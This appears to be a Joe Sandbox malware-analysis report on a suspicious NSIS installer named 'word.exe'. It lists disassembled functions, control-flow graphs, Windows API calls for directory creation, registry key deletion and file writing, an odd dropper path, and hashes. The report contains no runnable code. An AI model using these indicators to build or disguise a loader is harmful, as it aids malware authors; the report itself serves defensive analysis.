                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsy9448.tmp
                                                          • API String ID: 1356686001-4006887098
                                                          • Opcode ID: d31aa366e37b9b3f9fe6114590fb4958bdebd1bd222923d910175118945ab26d
                                                          • Instruction ID: 1cf33929fc1c1ea186c23a4fc9732b6d29fed694b94c5232bf99ec9a4aeb90bc
                                                          • Opcode Fuzzy Hash: d31aa366e37b9b3f9fe6114590fb4958bdebd1bd222923d910175118945ab26d
                                                          • Instruction Fuzzy Hash: 941172B1E00118BFEB10EFA4DE89EAF7678FB50358F10413AF905B61D1D7B85D41A668

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 731 4015b3-4015c6 call 4029fd call 40581a 736 4015c8-4015e3 call 4057ac CreateDirectoryA 731->736 737 40160a-40160d 731->737 745 401600-401608 736->745 746 4015e5-4015f0 GetLastError 736->746 739 401638-402181 call 401423 737->739 740 40160f-40162a call 401423 call 405cf1 SetCurrentDirectoryA 737->740 753 402892-4028a1 739->753 740->753 754 401630-401633 740->754 745->736 745->737 749 4015f2-4015fb GetFileAttributesA 746->749 750 4015fd 746->750 749->745 749->750 750->745 754->753
                                                          APIs
                                                            • Part of subcall function 0040581A: CharNextA.USER32(?,?,C:\,?,00405886,C:\,C:\,?,?,77582EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 00405828
                                                            • Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 0040582D
                                                            • Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 00405841
                                                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 004015DB
                                                          • GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015E5
                                                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 004015F3
                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\spherosome\preadoption\preembodiment\Himlede,00000000,00000000,?), ref: 00401622
                                                          Strings
                                                          • C:\Users\user\spherosome\preadoption\preembodiment\Himlede, xrefs: 00401617
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                          • String ID: C:\Users\user\spherosome\preadoption\preembodiment\Himlede
                                                          • API String ID: 3751793516-3180547735
                                                          • Opcode ID: db067ccd22148f177b322be21d88d745b7a3f5ab5b1866c20e8660ff99211a32
                                                          • Instruction ID: 1974da3e9f268a507fe0b48e67c441281edfefc09bb705423f1444e47e3c3739
                                                          • Opcode Fuzzy Hash: db067ccd22148f177b322be21d88d745b7a3f5ab5b1866c20e8660ff99211a32
                                                          • Instruction Fuzzy Hash: 4D112931908150ABDB113F755D4496F37B4EA62365728873FF891B22D1C23C4D42A62E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 757 4059b1-4059bb 758 4059bc-4059e7 GetTickCount GetTempFileNameA 757->758 759 4059f6-4059f8 758->759 760 4059e9-4059eb 758->760 762 4059f0-4059f3 759->762 760->758 761 4059ed 760->761 761->762
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004059C5
                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059DF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\user\Desktop\word.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-538414908
                                                          • Opcode ID: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
                                                          • Instruction ID: 4ed204ab2def1aeaad47fe5e86fe5e9a332b18b7b34da24a025185dbc17c0528
                                                          • Opcode Fuzzy Hash: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
                                                          • Instruction Fuzzy Hash: 60F02732308308BBEB008F16DC04B9B7B9CDF95720F00C03BF904EA281D2B0D8048B98

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 763 402a3d-402a66 RegOpenKeyExA 764 402ad1-402ad5 763->764 765 402a68-402a73 763->765 766 402a8e-402a9e RegEnumKeyA 765->766 767 402aa0-402ab2 RegCloseKey call 40601c 766->767 768 402a75-402a78 766->768 776 402ab4-402ac3 767->776 777 402ad8-402ade 767->777 769 402ac5-402ac8 RegCloseKey 768->769 770 402a7a-402a8c call 402a3d 768->770 772 402ace-402ad0 769->772 770->766 770->767 772->764 776->764 777->772 778 402ae0-402aee RegDeleteKeyA 777->778 778->772 780 402af0 778->780 780->764
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A5E
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: c984344fdf4f474ce3138d385fa253ab73c2912e651deaf7f4d1b8ad40b66a52
                                                          • Instruction ID: 87201a58af63731299c065c60a73f314b5aa52cedce30dc2bb0b82caebebd8ee
                                                          • Opcode Fuzzy Hash: c984344fdf4f474ce3138d385fa253ab73c2912e651deaf7f4d1b8ad40b66a52
                                                          • Instruction Fuzzy Hash: 7B114F71A00008FFDF219F90DE48EAA3B7DEB44349B104076FA05B11A0D7B59E55AF69

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 781 100016bd-100016f9 call 10001a5d 785 1000180a-1000180c 781->785 786 100016ff-10001703 781->786 787 10001705-1000170b call 100021b0 786->787 788 1000170c-10001719 call 100021fa 786->788 787->788 793 10001749-10001750 788->793 794 1000171b-10001720 788->794 795 10001770-10001774 793->795 796 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 793->796 797 10001722-10001723 794->797 798 1000173b-1000173e 794->798 802 100017b2-100017b8 call 100023da 795->802 803 10001776-100017b0 call 10001559 call 100023da 795->803 819 100017b9-100017bd 796->819 800 10001725-10001726 797->800 801 1000172b-1000172c call 100027ec 797->801 798->793 804 10001740-10001741 call 10002aa7 798->804 807 10001733-10001739 call 1000258d 800->807 808 10001728-10001729 800->808 814 10001731 801->814 802->819 803->819 817 10001746 804->817 818 10001748 807->818 808->793 808->801 814->817 817->818 818->793 823 100017fa-10001801 819->823 824 100017bf-100017cd call 100023a0 819->824 823->785 829 10001803-10001804 GlobalFree 823->829 831 100017e5-100017ec 824->831 832 100017cf-100017d2 824->832 829->785 831->823 834 100017ee-100017f9 call 100014e2 831->834 832->831 833 100017d4-100017dc 832->833 833->831 835 100017de-100017df FreeLibrary 833->835 834->823 835->831
                                                          APIs
                                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                          • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                            • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(?,7D8BEC45), ref: 100021E2
                                                            • Part of subcall function 1000258D: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FF
                                                            • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_word.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                          • String ID:
                                                          • API String ID: 1791698881-3916222277
                                                          • Opcode ID: cd3a49c7226bd267e48e570e062e78a21ab1dc0dccc3f926e80528383bd8a00b
                                                          • Instruction ID: 946e86dc2be410c0748ecba0c1d48508df540d87c222276c6f0f58241c559a10
                                                          • Opcode Fuzzy Hash: cd3a49c7226bd267e48e570e062e78a21ab1dc0dccc3f926e80528383bd8a00b
                                                          • Instruction Fuzzy Hash: C5318B79408205DAFB41DF649CC5BCA37ECFB042D5F018465FA0A9A09ADF78A8458A60

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 838 401bb8-401bd0 call 4029e0 * 2 843 401bd2-401bd9 call 4029fd 838->843 844 401bdc-401be0 838->844 843->844 846 401be2-401be9 call 4029fd 844->846 847 401bec-401bf2 844->847 846->847 849 401bf4-401c08 call 4029e0 * 2 847->849 850 401c38-401c5e call 4029fd * 2 FindWindowExA 847->850 861 401c28-401c36 SendMessageA 849->861 862 401c0a-401c26 SendMessageTimeoutA 849->862 863 401c64 850->863 861->863 864 401c67-401c6a 862->864 863->864 865 401c70 864->865 866 402892-4028a1 864->866 865->866
                                                          APIs
                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
                                                          • Instruction ID: c8505a4ed1fbcfe48898eca751f608fe424cacc25c72cee6cab93c7adb8e4515
                                                          • Opcode Fuzzy Hash: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
                                                          • Instruction Fuzzy Hash: 742190B1A44208BFEF41AFB4CD4AAAE7BB5EF40344F14453EF541B61D1D6B89A40E728

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 869 40303a-403063 GetTickCount 870 4031a4-4031ac call 402bda 869->870 871 403069-403094 call 4031cc SetFilePointer 869->871 876 4031ae-4031b3 870->876 877 403099-4030ab 871->877 878 4030ad 877->878 879 4030af-4030bd call 4031b6 877->879 878->879 882 4030c3-4030cf 879->882 883 403196-403199 879->883 884 4030d5-4030db 882->884 883->876 885 403106-403122 call 40611c 884->885 886 4030dd-4030e3 884->886 892 403124-40312c 885->892 893 40319f 885->893 886->885 888 4030e5-403105 call 402bda 886->888 888->885 895 403160-403166 892->895 896 40312e-403144 WriteFile 892->896 894 4031a1-4031a2 893->894 894->876 895->893 899 403168-40316a 895->899 897 403146-40314a 896->897 898 40319b-40319d 896->898 897->898 900 40314c-403158 897->900 898->894 899->893 901 40316c-40317f 899->901 900->884 902 40315e 900->902 901->877 903 403185-403194 SetFilePointer 901->903 902->901 903->870
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 0040304F
                                                            • Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
                                                          • WriteFile.KERNELBASE(0040A8A0,00410ACF,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?), ref: 0040313C
                                                          • SetFilePointer.KERNELBASE(00004B8B,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB), ref: 0040318E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$CountTickWrite
                                                          • String ID:
                                                          • API String ID: 2146148272-0
                                                          • Opcode ID: e969f51fb91c1eed4d8a9bc9024c2eb0b6bf39f0f502a3b67258e99aab1be33f
                                                          • Instruction ID: 2060b4db2a59e7e801be0a10e6f45457beaa1fbeaf8038f8ae1418eaad325724
                                                          • Opcode Fuzzy Hash: e969f51fb91c1eed4d8a9bc9024c2eb0b6bf39f0f502a3b67258e99aab1be33f
                                                          • Instruction Fuzzy Hash: 4B414F725052019FDB10BF29EE849663BFCFB4431A715863BE810BA2E4D7389952CB5E
                                                          APIs
                                                            • Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE
                                                            • Part of subcall function 0040581A: CharNextA.USER32(?,?,C:\,?,00405886,C:\,C:\,?,?,77582EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 00405828
                                                            • Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 0040582D
                                                            • Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 00405841
                                                          • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,77582EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 004058C2
                                                          • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,77582EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,77582EE0), ref: 004058D2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\
                                                          • API String ID: 3248276644-3404278061
                                                          • Opcode ID: 701659df45ad2e7dc9a8ac17e88d16d16a3f1e089910ceabf1d04e9e8156ac98
                                                          • Instruction ID: 7f50483e2a8f6f86a99d9ce3f0559f7f2fa95531c727e4579d4e18038bffad21
                                                          • Opcode Fuzzy Hash: 701659df45ad2e7dc9a8ac17e88d16d16a3f1e089910ceabf1d04e9e8156ac98
                                                          • Instruction Fuzzy Hash: 06F02823105E112AD626323A1C49AAF0A54CE86364718C13BFC51B32D2CB3C8C23EDBE
                                                          APIs
                                                            • Part of subcall function 00405F5C: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\word.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FB4
                                                            • Part of subcall function 00405F5C: CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
                                                            • Part of subcall function 00405F5C: CharNextA.USER32(?,"C:\Users\user\Desktop\word.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FC6
                                                            • Part of subcall function 00405F5C: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FD6
                                                          • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00403204
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 4115351271-2414109610
                                                          • Opcode ID: 19db8b8bfed8fece06fc430a338c59f426dc89455e02ba762a85112f258f8684
                                                          • Instruction ID: 49f334a6ee715e6e2f1f3bf4cc11e7508e43270cc78003a87510b5ca2b0d9132
                                                          • Opcode Fuzzy Hash: 19db8b8bfed8fece06fc430a338c59f426dc89455e02ba762a85112f258f8684
                                                          • Instruction Fuzzy Hash: 4CD0C71154AD3066D55137263D46FCF050C8F46719F514077FD04751C29B6C594365EF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02ed812fe0e611b0f2998a09c2da57c3139bdc2a01b144affc629b665b317990
                                                          • Instruction ID: cc181508766c158152089796d80991778684c5c1c63ccc40f22f1fdcfebbd241
                                                          • Opcode Fuzzy Hash: 02ed812fe0e611b0f2998a09c2da57c3139bdc2a01b144affc629b665b317990
                                                          • Instruction Fuzzy Hash: C8A13371E00228CBDF28CFA8C8547ADBBB1FB44305F15816EE816BB281D7785A96DF44
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 214f48695c7995470a7a0fcbeb3eca81d4e2424ba51fdacd53dd0d027dd6a452
                                                          • Instruction ID: 3fc28d3a08aea7e3d86c5d24e10e7686d7df8f1296a80a0676572424d41607f7
                                                          • Opcode Fuzzy Hash: 214f48695c7995470a7a0fcbeb3eca81d4e2424ba51fdacd53dd0d027dd6a452
                                                          • Instruction Fuzzy Hash: FF912370E00228CBDF28CF98C8547ADBBB1FB45305F15816ED816BB291D7785A96DF44
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
